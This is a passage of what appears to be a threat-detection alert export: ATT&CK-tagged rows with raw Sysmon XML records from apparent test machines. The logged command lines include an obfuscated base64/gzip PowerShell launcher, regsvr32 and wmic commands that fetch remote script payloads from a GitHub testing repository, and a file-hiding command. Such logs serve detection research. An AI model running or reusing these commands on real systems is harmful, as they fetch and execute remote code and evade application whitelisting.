8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9807 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.949 + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-2586-5CC9-0000-0010DC530000 + 460 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311373 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:01:03.894 + 747F3D96-939F-5F07-0000-0010888E4600 + 7456 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-86FA-5F07-0000-00204A8B0600 + 0x68b4a + 2 + Medium + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-86FC-5F07-0000-00101E4B0700 + 2356 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4941 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:54.044 + 747F3D96-6642-5D3F-0000-0010F69D8A00 + 4896 + C:\Windows\System32\wbem\WMIC.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966388 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:27.697 + 365ABB72-55D7-5C91-0000-001067BD0700 + 2236 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421218 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.428 + 747F3D96-75D1-5F8B-0000-00109EB23300 + 2628 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4939 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:53.759 + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4939 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:53.759 + 747F3D96-6641-5D3F-0000-0010A38C8A00 + 4260 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 311365 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-09 22:00:45.576 + 747F3D96-938D-5F07-0000-001043A84500 + 7976 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + MSEDGEWIN10\IEUser + 747F3D96-86FA-5F07-0000-00204A8B0600 + 0x68b4a + 2 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-86FC-5F07-0000-00101E4B0700 + 2356 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4936 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:49.535 + 747F3D96-663D-5D3F-0000-00106F608A00 + 3240 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966382 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:48:33.639 + 365ABB72-55A1-5C91-0000-0010D6960700 + 2368 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 22013 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories + 2019-05-19 17:32:00.478 + DFAE8213-9310-5CE1-0000-0010EABA0A00 + 2728 + C:\Windows\System32\attrib.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + Attribute Utility + Microsoft® Windows® Operating System + Microsoft Corporation + attrib +h nbtscan.exe + c:\ProgramData\ + insecurebank\Administrator + DFAE8213-9133-5CE1-0000-0020CC660500 + 0x566cc + 2 + High + SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02 + DFAE8213-91CC-5CE1-0000-0010BEF40600 + 3408 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4934 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:44.949 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49829 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4933 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:45.332 + 747F3D96-6639-5D3F-0000-001074F48900 + 208 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\calc.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F + 747F3D96-6638-5D3F-0000-00103DA88900 + 1652 + C:\Windows\System32\cmd.exe + cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564436024.81932,2019-07-30T01:33:44.819320+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4931 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:44.622 + 747F3D96-6638-5D3F-0000-001067BA8900 + 4288 + C:\Windows\System32\regsvr32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + regsvr32.exe /s /u 